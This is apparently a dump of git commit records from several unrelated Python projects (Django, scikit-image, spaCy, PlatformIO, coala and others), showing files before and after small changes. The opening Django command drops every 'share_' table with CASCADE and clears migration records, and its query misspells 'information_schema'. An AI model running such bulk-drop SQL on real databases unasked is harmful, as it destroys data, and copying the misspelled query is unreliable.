from django.db import transaction
class Command(BaseCommand):
def handle(self, *args, **options):
with transaction.atomic():
with connection.cursor() as c:
c.execute('''
DO $$
DECLARE
tname TEXT;
keep TEXT [] = ARRAY [];
BEGIN FOR tname IN (SELECT table_name
FROM information_schem.tables
WHERE table_schema = 'public' AND NOT (table_name = ANY (keep))
AND table_name LIKE 'share_%'
AND NOT table_name LIKE 'share_shareuser%'
LOOP
RAISE NOTICE 'DROP TABLE % CASCADE', tname;
EXECUTE 'DROP TABLE ' || tname || ' CASCADE';
END LOOP;
END;
$$
''')
c.execute("DELETE FROM django_migrations WHERE app = 'share';")
| apache-2.0 | Python |
dd45f15ced95ed43b889f464b4116bb8f4124d99 | Use explicit keyword for dtype | dpshelio/scikit-image,WarrenWeckesser/scikits-image,vighneshbirodkar/scikit-image,SamHames/scikit-image,ClinicalGraphics/scikit-image,ajaybhat/scikit-image,almarklein/scikit-image,Britefury/scikit-image,Midafi/scikit-image,Hiyorimi/scikit-image,chriscrosscutler/scikit-image,oew1v07/scikit-image,chintak/scikit-image,rjeli/scikit-image,chriscrosscutler/scikit-image,robintw/scikit-image,almarklein/scikit-image,bsipocz/scikit-image,keflavich/scikit-image,GaZ3ll3/scikit-image,Midafi/scikit-image,almarklein/scikit-image,paalge/scikit-image,keflavich/scikit-image,juliusbierk/scikit-image,jwiggins/scikit-image,ClinicalGraphics/scikit-image,chintak/scikit-image,rjeli/scikit-image,Hiyorimi/scikit-image,michaelaye/scikit-image,michaelpacer/scikit-image,warmspringwinds/scikit-image,michaelaye/scikit-image,robintw/scikit-image,youprofit/scikit-image,newville/scikit-image,paalge/scikit-image,jwiggins/scikit-image,dpshelio/scikit-image,emon10005/scikit-image,GaZ3ll3/scikit-image,paalge/scikit-image,vighneshbirodkar/scikit-image,blink1073/scikit-image,michaelpacer/scikit-image,vighneshbirodkar/scikit-image,newville/scikit-image,bennlich/scikit-image,ofgulban/scikit-image,warmspringwinds/scikit-image,oew1v07/scikit-image,juliusbierk/scikit-image,emon10005/scikit-image,Britefury/scikit-image,SamHames/scikit-image,almarklein/scikit-image,ajaybhat/scikit-image,SamHames/scikit-image,blink1073/scikit-image,youprofit/scikit-image,bsipocz/scikit-image,bennlich/scikit-image,chintak/scikit-image,rjeli/scikit-image,ofgulban/scikit-image,chintak/scikit-image,WarrenWeckesser/scikits-image,pratapvardhan/scikit-image,pratapvardhan/scikit-image,SamHames/scikit-image,ofgulban/scikit-image | skimage/segmentation/_clear_border.py | skimage/segmentation/_clear_border.py | import numpy as np
from scipy.ndimage import label
def clear_border(image, buffer_size=0, bgval=0):
"""Clear objects connected to image border.
The changes will be applied to the input image.
Parameters
----------
image : (N, M) array
Binary image.
buffer_size : int, optional
Define additional buffer around image border.
bgval : float or int, optional
Value for cleared objects.
Returns
-------
image : (N, M) array
Cleared binary image.
Examples
--------
>>> import numpy as np
>>> from skimage.segmentation import clear_border
>>> image = np.array([[0, 0, 0, 0, 0, 0, 0, 1, 0],
... [0, 0, 0, 0, 1, 0, 0, 0, 0],
... [1, 0, 0, 1, 0, 1, 0, 0, 0],
... [0, 0, 1, 1, 1, 1, 1, 0, 0],
... [0, 1, 1, 1, 1, 1, 1, 1, 0],
... [0, 0, 0, 0, 0, 0, 0, 0, 0]])
>>> clear_border(image)
array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]])
"""
rows, cols = image.shape
if buffer_size >= rows or buffer_size >= cols:
raise ValueError("buffer size may not be greater than image size")
# create borders with buffer_size
borders = np.zeros_like(image, dtype=np.bool_)
ext = buffer_size + 1
borders[:ext] = True
borders[- ext:] = True
borders[:, :ext] = True
borders[:, - ext:] = True
labels, number = label(image)
# determine all objects that are connected to borders
borders_indices = np.unique(labels[borders])
indices = np.arange(number + 1)
# mask all label indices that are connected to borders
label_mask = np.in1d(indices, borders_indices)
# create mask for pixels to clear
mask = label_mask[labels.ravel()].reshape(labels.shape)
# clear border pixels
image[mask] = bgval
return image
| import numpy as np
from scipy.ndimage import label
def clear_border(image, buffer_size=0, bgval=0):
"""Clear objects connected to image border.
The changes will be applied to the input image.
Parameters
----------
image : (N, M) array
Binary image.
buffer_size : int, optional
Define additional buffer around image border.
bgval : float or int, optional
Value for cleared objects.
Returns
-------
image : (N, M) array
Cleared binary image.
Examples
--------
>>> import numpy as np
>>> from skimage.segmentation import clear_border
>>> image = np.array([[0, 0, 0, 0, 0, 0, 0, 1, 0],
... [0, 0, 0, 0, 1, 0, 0, 0, 0],
... [1, 0, 0, 1, 0, 1, 0, 0, 0],
... [0, 0, 1, 1, 1, 1, 1, 0, 0],
... [0, 1, 1, 1, 1, 1, 1, 1, 0],
... [0, 0, 0, 0, 0, 0, 0, 0, 0]])
>>> clear_border(image)
array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]])
"""
rows, cols = image.shape
if buffer_size >= rows or buffer_size >= cols:
raise ValueError("buffer size may not be greater than image size")
# create borders with buffer_size
borders = np.zeros_like(image, np.bool_)
ext = buffer_size + 1
borders[:ext] = True
borders[- ext:] = True
borders[:, :ext] = True
borders[:, - ext:] = True
labels, number = label(image)
# determine all objects that are connected to borders
borders_indices = np.unique(labels[borders])
indices = np.arange(number + 1)
# mask all label indices that are connected to borders
label_mask = np.in1d(indices, borders_indices)
# create mask for pixels to clear
mask = label_mask[labels.ravel()].reshape(labels.shape)
# clear border pixels
image[mask] = bgval
return image
| bsd-3-clause | Python |
0adadcb3f04e2ecb98b5ca5de1afba2ba7208d23 | Fix beam parse model test | aikramer2/spaCy,spacy-io/spaCy,recognai/spaCy,recognai/spaCy,explosion/spaCy,recognai/spaCy,explosion/spaCy,spacy-io/spaCy,recognai/spaCy,explosion/spaCy,spacy-io/spaCy,spacy-io/spaCy,aikramer2/spaCy,explosion/spaCy,spacy-io/spaCy,aikramer2/spaCy,spacy-io/spaCy,honnibal/spaCy,explosion/spaCy,honnibal/spaCy,aikramer2/spaCy,recognai/spaCy,honnibal/spaCy,aikramer2/spaCy,recognai/spaCy,honnibal/spaCy,explosion/spaCy,aikramer2/spaCy | spacy/tests/parser/test_beam_parse.py | spacy/tests/parser/test_beam_parse.py | # coding: utf8
from __future__ import unicode_literals
import pytest
@pytest.mark.models('en')
def test_beam_parse(EN):
    """Smoke-test beam-search NER: parse with the pipeline's NER disabled,
    then run the entity recogniser manually with beam_width > 1. No exact
    output is asserted; this only checks the call path does not crash.
    """
    doc = EN(u'Australia is a country', disable=['ner'])
    ents = EN.entity(doc, beam_width=2)
    print(ents)
| import spacy
import pytest
@pytest.mark.models
def test_beam_parse():
    """Smoke-test beam-search NER against a freshly loaded small English
    model; only checks that the call path does not crash.
    """
    nlp = spacy.load('en_core_web_sm')
    doc = nlp(u'Australia is a country', disable=['ner'])
    ents = nlp.entity(doc, beam_width=2)
    print(ents)
| mit | Python |
54d2a1c109de23aa8ab0556bc07cfd4dc29f7f25 | fix return in check function | sdpython/code_beatrix,sdpython/code_beatrix,sdpython/code_beatrix,sdpython/code_beatrix | src/code_beatrix/scratchs/__init__.py | src/code_beatrix/scratchs/__init__.py | """
@file
@brief shortcuts for scratch
"""
#from .example_echiquier import check as check1
from .example_echiquier import check_echiquier
from .example_tri import check_tri
from .example_pyramide import check_pyramide
from .example_chute import check_chute
def check():
    """
    run checking functions

    Executes every scratch example's self-check in sequence; a failing
    example is expected to raise from its own check function. Returns
    True when all checks completed.
    """
    check_echiquier()
    check_tri()
    check_pyramide()
    check_chute()
    return True
| """
@file
@brief shortcuts for scratch
"""
#from .example_echiquier import check as check1
from .example_echiquier import check_echiquier
from .example_tri import check_tri
from .example_pyramide import check_pyramide
from .example_chute import check_chute
def check():
    """
    run checking functions

    Executes every scratch example's self-check in sequence; a failing
    example is expected to raise from its own check function.
    """
    check_echiquier()
    check_tri()
    check_pyramide()
    check_chute()
| mit | Python |
6e8f60a27a5a1dc05162ad33fe3490677469b956 | Bump version to 5.2.4b1 | platformio/platformio-core,platformio/platformio,platformio/platformio-core | platformio/__init__.py | platformio/__init__.py | # Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
# Release version tuple; a string third component marks a pre-release
# ("4b1" = beta 1 of 5.2.4).
VERSION = (5, 2, "4b1")
__version__ = ".".join([str(s) for s in VERSION])
__title__ = "platformio"
__description__ = (
    "A professional collaborative platform for embedded development. "
    "Cross-platform IDE and Unified Debugger. "
    "Static Code Analyzer and Remote Unit Testing. "
    "Multi-platform and Multi-architecture Build System. "
    "Firmware File Explorer and Memory Inspection. "
    "IoT, Arduino, CMSIS, ESP-IDF, FreeRTOS, libOpenCM3, mbedOS, Pulp OS, SPL, "
    "STM32Cube, Zephyr RTOS, ARM, AVR, Espressif (ESP8266/ESP32), FPGA, "
    "MCS-51 (8051), MSP430, Nordic (nRF51/nRF52), NXP i.MX RT, PIC32, RISC-V, "
    "STMicroelectronics (STM8/STM32), Teensy"
)
__url__ = "https://platformio.org"
__author__ = "PlatformIO Labs"
__email__ = "contact@piolabs.com"
__license__ = "Apache Software License"
__copyright__ = "Copyright 2014-present PlatformIO Labs"
__accounts_api__ = "https://api.accounts.platformio.org"
# Primary registry endpoint first; ns1 mirror as fallback.
__registry_api__ = [
    "https://api.registry.platformio.org",
    "https://api.registry.ns1.platformio.org",
]
__pioremote_endpoint__ = "ssl:host=remote.platformio.org:port=4413"
__default_requests_timeout__ = (10, None)  # (connect, read)
# Pinned core tool/contrib package requirements; contrib-pysite tracks the
# running interpreter's major.minor version.
__core_packages__ = {
    "contrib-piohome": "~3.4.0",
    "contrib-pysite": "~2.%d%d.0" % (sys.version_info.major, sys.version_info.minor),
    "tool-unity": "~1.20500.0",
    "tool-scons": "~4.40300.0",
    "tool-cppcheck": "~1.260.0",
    "tool-clangtidy": "~1.120001.0",
    "tool-pvs-studio": "~7.14.0",
}
# Hosts probed for connectivity checks; raw IPs listed first so a DNS
# failure does not mask a working link.
__check_internet_hosts__ = [
    "185.199.110.153",  # Github.com
    "88.198.170.159", # platformio.org
    "github.com",
    "platformio.org",
]
| # Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
VERSION = (5, 2, "4a4")
__version__ = ".".join([str(s) for s in VERSION])
__title__ = "platformio"
__description__ = (
"A professional collaborative platform for embedded development. "
"Cross-platform IDE and Unified Debugger. "
"Static Code Analyzer and Remote Unit Testing. "
"Multi-platform and Multi-architecture Build System. "
"Firmware File Explorer and Memory Inspection. "
"IoT, Arduino, CMSIS, ESP-IDF, FreeRTOS, libOpenCM3, mbedOS, Pulp OS, SPL, "
"STM32Cube, Zephyr RTOS, ARM, AVR, Espressif (ESP8266/ESP32), FPGA, "
"MCS-51 (8051), MSP430, Nordic (nRF51/nRF52), NXP i.MX RT, PIC32, RISC-V, "
"STMicroelectronics (STM8/STM32), Teensy"
)
__url__ = "https://platformio.org"
__author__ = "PlatformIO Labs"
__email__ = "contact@piolabs.com"
__license__ = "Apache Software License"
__copyright__ = "Copyright 2014-present PlatformIO Labs"
__accounts_api__ = "https://api.accounts.platformio.org"
__registry_api__ = [
"https://api.registry.platformio.org",
"https://api.registry.ns1.platformio.org",
]
__pioremote_endpoint__ = "ssl:host=remote.platformio.org:port=4413"
__default_requests_timeout__ = (10, None) # (connect, read)
__core_packages__ = {
"contrib-piohome": "~3.4.0",
"contrib-pysite": "~2.%d%d.0" % (sys.version_info.major, sys.version_info.minor),
"tool-unity": "~1.20500.0",
"tool-scons": "~4.40300.0",
"tool-cppcheck": "~1.260.0",
"tool-clangtidy": "~1.120001.0",
"tool-pvs-studio": "~7.14.0",
}
__check_internet_hosts__ = [
"185.199.110.153", # Github.com
"88.198.170.159", # platformio.org
"github.com",
"platformio.org",
]
| apache-2.0 | Python |
ea576dc8a8082172d8b2c7a9edf1e00d384b5f14 | move import so it installs | SergioChan/Stream-Framework,Architizer/Feedly,Anislav/Stream-Framework,smuser90/Stream-Framework,nikolay-saskovets/Feedly,nikolay-saskovets/Feedly,izhan/Stream-Framework,turbolabtech/Stream-Framework,smuser90/Stream-Framework,turbolabtech/Stream-Framework,Anislav/Stream-Framework,nikolay-saskovets/Feedly,turbolabtech/Stream-Framework,SergioChan/Stream-Framework,Architizer/Feedly,izhan/Stream-Framework,smuser90/Stream-Framework,SergioChan/Stream-Framework,izhan/Stream-Framework,nikolay-saskovets/Feedly,Anislav/Stream-Framework,Architizer/Feedly,izhan/Stream-Framework,smuser90/Stream-Framework,SergioChan/Stream-Framework,Anislav/Stream-Framework,turbolabtech/Stream-Framework | feedly/connection.py | feedly/connection.py | #cache this at the process module level
# Process-wide cache of nydus clusters, keyed by the stringified config.
connection_cache = {}
def get_redis_connection():
    """Return a cached nydus Redis cluster built from Django settings.

    The django/nydus imports are deferred so this module can be imported
    before Django settings are configured.
    """
    from nydus.db import create_cluster
    from django.conf import settings
    config = settings.NYDUS_CONFIG['CONNECTIONS']['redis']
    # Key the cache on the config's string form so a settings change
    # yields a fresh cluster rather than a stale cached one.
    key = unicode(config)
    cluster = connection_cache.get(key)
    if not cluster:
        cluster = create_cluster(config)
        connection_cache[key] = cluster
    return cluster
| from nydus.db import create_cluster
#cache this at the process module level
connection_cache = {}
def get_redis_connection():
from django.conf import settings
config = settings.NYDUS_CONFIG['CONNECTIONS']['redis']
key = unicode(config)
cluster = connection_cache.get(key)
if not cluster:
cluster = create_cluster(config)
connection_cache[key] = cluster
return cluster
| bsd-3-clause | Python |
9a8d3fb2c65de3078eea987378c26360363217d2 | use django urlencode to fix string conversion of postcode in addressfinder | ministryofjustice/cla_frontend,ministryofjustice/cla_frontend,ministryofjustice/cla_frontend,ministryofjustice/cla_frontend | cla_frontend/apps/legalaid/addressfinder.py | cla_frontend/apps/legalaid/addressfinder.py | from django.conf import settings
from django.utils.http import urlencode
import requests
def query(path, **kwargs):
    """GET ``path`` on the addressfinder API with ``kwargs`` as querystring.

    django's urlencode is used (rather than string formatting) so that
    non-string values such as postcodes are converted and escaped safely.
    """
    return requests.get(
        "{host}/{path}?{args}".format(
            host=settings.ADDRESSFINDER_API_HOST,
            path=path,
            args=urlencode(kwargs)),
        headers={
            'Authorization': 'Token %s' % settings.ADDRESSFINDER_API_TOKEN},
        timeout=(2.0, 5.0))  # (connect, read) timeouts, seconds
def lookup_postcode(postcode):
    """Return the API response listing addresses for ``postcode``."""
    return query('addresses/', postcode=postcode)
| import urllib
from django.conf import settings
import requests
def query(path, **kwargs):
return requests.get(
"{host}/{path}?{args}".format(
host=settings.ADDRESSFINDER_API_HOST,
path=path,
args=urllib.urlencode(kwargs)),
headers={
'Authorization': 'Token %s' % settings.ADDRESSFINDER_API_TOKEN},
timeout=(2.0, 5.0))
def lookup_postcode(postcode):
return query('addresses/', postcode=postcode)
| mit | Python |
a105323c9f0a3f1868f31cd6e65008b25b46c9e4 | Move the matplotlib.pyplot code to its own function. | eliteraspberries/fftresize | fftresize/imutils.py | fftresize/imutils.py | #!/usr/bin/env python2
'''Read and write image files as NumPy arrays
'''
from matplotlib import pyplot
from numpy import amax, amin, around, asarray, zeros as _zeros
from numpy import float32, uint8
from os.path import exists, splitext
from PIL import Image
from random import randint
from sys import float_info as _float_info
DEFAULT_DTYPE = float32
def channels(img):
    '''The number of 2D channels in a 3D array.

    A plain 2D array counts as a single channel; arrays of any other
    rank are rejected by the argument unpacking.
    '''
    def _third_dim(rows, cols, depth=1):
        return depth
    return _third_dim(*img.shape)
def _normalize(array):
'''Normalize an array to the interval [0,1].
'''
min = amin(array)
max = amax(array)
array -= min
array /= max - min
eps = 10.0 * _float_info.epsilon
negs = array < 0.0 + eps
array[negs] = 0.0
bigs = array > 1.0 - eps
array[bigs] = 1.0
return
def read(filename, dtype=None):
    '''Return an array representing an image file.

    dtype defaults to DEFAULT_DTYPE (float32) when not given.
    '''
    if dtype is None:
        dtype = DEFAULT_DTYPE
    img = Image.open(filename)
    arr = asarray(img, dtype=dtype)
    return arr
def _pyplot_save(img, filename):
    # Single-channel data needs an explicit grayscale colormap; for
    # multi-channel (RGB/RGBA) data pyplot's default handling is used.
    if channels(img) == 1:
        cmap = pyplot.cm.gray
    else:
        cmap = None
    pyplot.imsave(filename, img, cmap=cmap)
    return
def save(img, filename):
    '''Save an array as a unique image file and return its path.

    The output name is derived from *filename* with a random numeric
    suffix. Note: *img* is normalized in place as a side effect.
    '''
    # Probe random suffixes until an unused file name is found.
    while True:
        newfile = splitext(filename)[0] + '-'
        newfile = newfile + str(randint(0, 1000)) + '.png'
        if not exists(newfile):
            break
    _normalize(img)
    # Quantize [0, 1] floats to rounded 8-bit [0, 255] values.
    uint8img = _zeros(img.shape, dtype=uint8)
    around(img * 255, out=uint8img)
    _pyplot_save(uint8img, newfile)
    return newfile
if __name__ == '__main__':
pass
| #!/usr/bin/env python2
'''Read and write image files as NumPy arrays
'''
from matplotlib import pyplot
from numpy import amax, amin, around, asarray, zeros as _zeros
from numpy import float32, uint8
from os.path import exists, splitext
from PIL import Image
from random import randint
from sys import float_info as _float_info
DEFAULT_DTYPE = float32
def channels(img):
'''The number of 2D channels in a 3D array.
'''
_channels = lambda x, y, z=1: z
return _channels(*img.shape)
def _normalize(array):
'''Normalize an array to the interval [0,1].
'''
min = amin(array)
max = amax(array)
array -= min
array /= max - min
eps = 10.0 * _float_info.epsilon
negs = array < 0.0 + eps
array[negs] = 0.0
bigs = array > 1.0 - eps
array[bigs] = 1.0
return
def read(filename, dtype=None):
'''Return an array representing an image file.
'''
if dtype is None:
dtype = DEFAULT_DTYPE
img = Image.open(filename)
arr = asarray(img, dtype=dtype)
return arr
def save(img, filename):
'''Save an array as a unique image file and return its path.
'''
while True:
newfile = splitext(filename)[0] + '-'
newfile = newfile + str(randint(0, 1000)) + '.png'
if not exists(newfile):
break
_normalize(img)
uint8img = _zeros(img.shape, dtype=uint8)
around(img * 255, out=uint8img)
if channels(img) == 1:
cmap = pyplot.cm.gray
else:
cmap = None
pyplot.imsave(newfile, uint8img, cmap=cmap)
return newfile
if __name__ == '__main__':
pass
| isc | Python |
d311f8069e8a4bf9a4d45c356955622059d75f10 | fix importing dependencies | levabd/stack-updater | stackupdater/src/lib/wrappers/process.py | stackupdater/src/lib/wrappers/process.py | # coding=utf-8
from .. import logger
class ProcessWrapper(object):
"""Wraps the subprocess popen method and provides logging."""
def __init__(self):
pass
@staticmethod
def call(*popenargs, **kwargs):
"""Run command with arguments. Wait for command to complete. Sends
output to logging module. The arguments are the same as for the Popen
constructor."""
from subprocess import Popen, PIPE
kwargs['stdout'] = PIPE
kwargs['stderr'] = PIPE
p = Popen(*popenargs, **kwargs)
stdout, stderr = p.communicate()
if stdout:
for line in stdout.strip().split("\n"):
logger.info(line)
if stderr:
for line in stderr.strip().split("\n"):
logger.error(line)
return p.returncode | # coding=utf-8
from lib import logger
class ProcessWrapper(object):
"""Wraps the subprocess popen method and provides logging."""
def __init__(self):
pass
@staticmethod
def call(*popenargs, **kwargs):
"""Run command with arguments. Wait for command to complete. Sends
output to logging module. The arguments are the same as for the Popen
constructor."""
from subprocess import Popen, PIPE
kwargs['stdout'] = PIPE
kwargs['stderr'] = PIPE
p = Popen(*popenargs, **kwargs)
stdout, stderr = p.communicate()
if stdout:
for line in stdout.strip().split("\n"):
logger.info(line)
if stderr:
for line in stderr.strip().split("\n"):
logger.error(line)
return p.returncode | mit | Python |
96243824bbccecd2bfe3b19e09dd7e6daf16621d | Remove our own sizing | quozl/sugar-toolkit-gtk3,samdroid-apps/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit-gtk3,puneetgkaur/backup_sugar_sugartoolkit,manuq/sugar-toolkit-gtk3,godiard/sugar-toolkit-gtk3,manuq/sugar-toolkit-gtk3,quozl/sugar-toolkit-gtk3,tchx84/sugar-toolkit-gtk3,Daksh/sugar-toolkit-gtk3,quozl/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit,tchx84/sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit-gtk3,godiard/sugar-toolkit-gtk3,puneetgkaur/backup_sugar_sugartoolkit,ceibal-tatu/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit-gtk3,i5o/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit-gtk3,quozl/sugar-toolkit-gtk3,gusDuarte/sugar-toolkit-gtk3,samdroid-apps/sugar-toolkit-gtk3,Daksh/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit,sugarlabs/sugar-toolkit,tchx84/debian-pkg-sugar-toolkit,i5o/sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit,godiard/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit,samdroid-apps/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit,gusDuarte/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit,sugarlabs/sugar-toolkit-gtk3,i5o/sugar-toolkit-gtk3,manuq/sugar-toolkit-gtk3,puneetgkaur/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit,samdroid-apps/sugar-toolkit-gtk3,gusDuarte/sugar-toolkit-gtk3,puneetgkaur/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit-gtk3,puneetgkaur/sugar-toolkit-gtk3,puneetgkaur/backup_sugar_sugartoolkit,ceibal-tatu/sugar-toolkit,tchx84/sugar-toolkit-gtk3,gusDuarte/sugar-toolkit-gtk3,i5o/sugar-toolkit-gtk3,Daksh/sugar-toolkit-gtk3 | sugar/graphics/filechooser.py | sugar/graphics/filechooser.py | import gtk
from sugar.graphics import units
class FileChooserDialog(gtk.FileChooserDialog):
    """Thin wrapper over gtk.FileChooserDialog (no extra sizing applied)."""
    def __init__(self, title=None, parent=None,
                 action=gtk.FILE_CHOOSER_ACTION_OPEN, buttons=None):
        gtk.FileChooserDialog.__init__(self, title, parent, action, buttons)
| import gtk
from sugar.graphics import units
class FileChooserDialog(gtk.FileChooserDialog):
    """gtk.FileChooserDialog with a Sugar-sized default window."""
    def __init__(self, title=None, parent=None,
                 action=gtk.FILE_CHOOSER_ACTION_OPEN, buttons=None):
        gtk.FileChooserDialog.__init__(self, title, parent, action, buttons)
        # Default size of 7*40 x 7*30 points, converted to pixels.
        self.set_default_size(units.points_to_pixels(7 * 40),
                              units.points_to_pixels(7 * 30))
| lgpl-2.1 | Python |
c2d6c4876355053f1219b1f9829114d7f9ddbe18 | Test ignoring defaults | Asnelchristian/coala,SambitAcharya/coala,djkonro/coala,Shade5/coala,FeodorFitsner/coala,Tanmay28/coala,stevemontana1980/coala,FeodorFitsner/coala,sophiavanvalkenburg/coala,NalinG/coala,shreyans800755/coala,SambitAcharya/coala,scottbelden/coala,saurabhiiit/coala,andreimacavei/coala,d6e/coala,aptrishu/coala,SanketDG/coala,MariosPanag/coala,yland/coala,RJ722/coala,incorrectusername/coala,Tanmay28/coala,nemaniarjun/coala,sils1297/coala,abhiroyg/coala,refeed/coala,stevemontana1980/coala,shreyans800755/coala,netman92/coala,sagark123/coala,andreimacavei/coala,aptrishu/coala,Tanmay28/coala,svsn2117/coala,NalinG/coala,SambitAcharya/coala,karansingh1559/coala,CruiseDevice/coala,impmihai/coala,Asnelchristian/coala,NalinG/coala,abhiroyg/coala,kartikeys98/coala,NiklasMM/coala,meetmangukiya/coala,coala/coala,meetmangukiya/coala,FeodorFitsner/coala,sagark123/coala,andreimacavei/coala,MattAllmendinger/coala,Asalle/coala,kartikeys98/coala,rimacone/testing2,swatilodha/coala,d6e/coala,Uran198/coala,ayushin78/coala,djkonro/coala,lonewolf07/coala,dagdaggo/coala,coala-analyzer/coala,AdeshAtole/coala,mr-karan/coala,damngamerz/coala,swatilodha/coala,nemaniarjun/coala,rresol/coala,AbdealiJK/coala,kartikeys98/coala,tushar-rishav/coala,arafsheikh/coala,arjunsinghy96/coala,sophiavanvalkenburg/coala,Shade5/coala,SambitAcharya/coala,scottbelden/coala,svsn2117/coala,sudheesh001/coala,NiklasMM/coala,rresol/coala,sophiavanvalkenburg/coala,scriptnull/coala,arush0311/coala,arafsheikh/coala,incorrectusername/coala,ManjiriBirajdar/coala,NiklasMM/coala,yashtrivedi96/coala,arush0311/coala,scriptnull/coala,yashtrivedi96/coala,Tanmay28/coala,AdeshAtole/coala,coala-analyzer/coala,JohnS-01/coala,netman92/coala,dagdaggo/coala,Uran198/coala,Nosferatul/coala,Asalle/coala,tltuan/coala,arjunsinghy96/coala,arush0311/coala,swatilodha/coala,sils1297/coala,tltuan/coala,yland/coala,refeed/coala,impmihai/coala,coala-analyzer/coala,svsn2117/coala,saurab
hiiit/coala,AbdealiJK/coala,Balaji2198/coala,ManjiriBirajdar/coala,RJ722/coala,arjunsinghy96/coala,MattAllmendinger/coala,arafsheikh/coala,ayushin78/coala,lonewolf07/coala,aptrishu/coala,jayvdb/coala,dagdaggo/coala,sagark123/coala,SambitAcharya/coala,Balaji2198/coala,yland/coala,yashtrivedi96/coala,RJ722/coala,SanketDG/coala,refeed/coala,mr-karan/coala,NalinG/coala,scriptnull/coala,ManjiriBirajdar/coala,Nosferatul/coala,sudheesh001/coala,rimacone/testing2,Tanmay28/coala,JohnS-01/coala,tltuan/coala,abhiroyg/coala,jayvdb/coala,yashLadha/coala,incorrectusername/coala,tushar-rishav/coala,AbdealiJK/coala,meetmangukiya/coala,lonewolf07/coala,NalinG/coala,jayvdb/coala,SambitAcharya/coala,coala/coala,sils1297/coala,SambitAcharya/coala,MattAllmendinger/coala,vinc456/coala,coala/coala,MariosPanag/coala,scottbelden/coala,karansingh1559/coala,Uran198/coala,AdeshAtole/coala,CruiseDevice/coala,karansingh1559/coala,Asnelchristian/coala,shreyans800755/coala,yashLadha/coala,yashLadha/coala,djkonro/coala,tushar-rishav/coala,rresol/coala,Shade5/coala,NalinG/coala,scriptnull/coala,CruiseDevice/coala,scriptnull/coala,JohnS-01/coala,vinc456/coala,nemaniarjun/coala,Tanmay28/coala,saurabhiiit/coala,Nosferatul/coala,sudheesh001/coala,scriptnull/coala,Tanmay28/coala,Tanmay28/coala,rimacone/testing2,damngamerz/coala,d6e/coala,impmihai/coala,vinc456/coala,stevemontana1980/coala,MariosPanag/coala,netman92/coala,mr-karan/coala,SanketDG/coala,Balaji2198/coala,scriptnull/coala,Asalle/coala,ayushin78/coala,damngamerz/coala,NalinG/coala | coalib/tests/settings/SettingsTest.py | coalib/tests/settings/SettingsTest.py | """
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import unittest
import sys
sys.path.insert(0, ".")
from coalib.settings.Settings import Settings, Setting
from coalib.misc.StringConstants import StringConstants
class SettingsTestCase(unittest.TestCase):
    """Unit tests for the Settings container and its defaults chaining."""
    def test_construction(self):
        # A Settings object may chain to another Settings as defaults...
        uut = Settings(StringConstants.COMPLEX_TEST_STRING, None)
        uut = Settings(StringConstants.COMPLEX_TEST_STRING, uut)
        # ...but not to arbitrary objects, and never to itself.
        self.assertRaises(TypeError, Settings, "irrelevant", 5)
        self.assertRaises(ValueError, uut.__init__, "name", uut)
    def test_append(self):
        uut = Settings(StringConstants.COMPLEX_TEST_STRING, None)
        # Only Setting instances may be appended.
        self.assertRaises(TypeError, uut.append, 5)
        uut.append(Setting(5, 5, 5))
    def test_iter(self):
        defaults = Settings("default", None)
        uut = Settings("name", defaults)
        uut.append(Setting(5,5,5))
        uut.append(Setting("TEsT",4,5))
        defaults.append(Setting("tEsT", 1,3))
        defaults.append(Setting(" great ", 3, 8))
        defaults.append(Setting(" great ", 3, 8), custom_key="custom")
        # Iteration yields normalized own keys first, then default-only keys.
        self.assertEqual(list(uut), ["5", "test", "great", "custom"])
        for index in uut:
            t = uut[index]
            self.assertNotEqual(t, None)
        # Membership and lookup are case-insensitive and whitespace-stripped.
        self.assertEqual(True, "teST" in defaults)
        self.assertEqual(True, " GREAT" in defaults)
        self.assertEqual(False, " GrEAT !" in defaults)
        self.assertEqual(False, "" in defaults)
        self.assertEqual(int(uut["teSt "]), 4)
        self.assertEqual(int(uut["GREAT "]), 3)
        self.assertRaises(IndexError, uut.__getitem__, "doesnotexist")
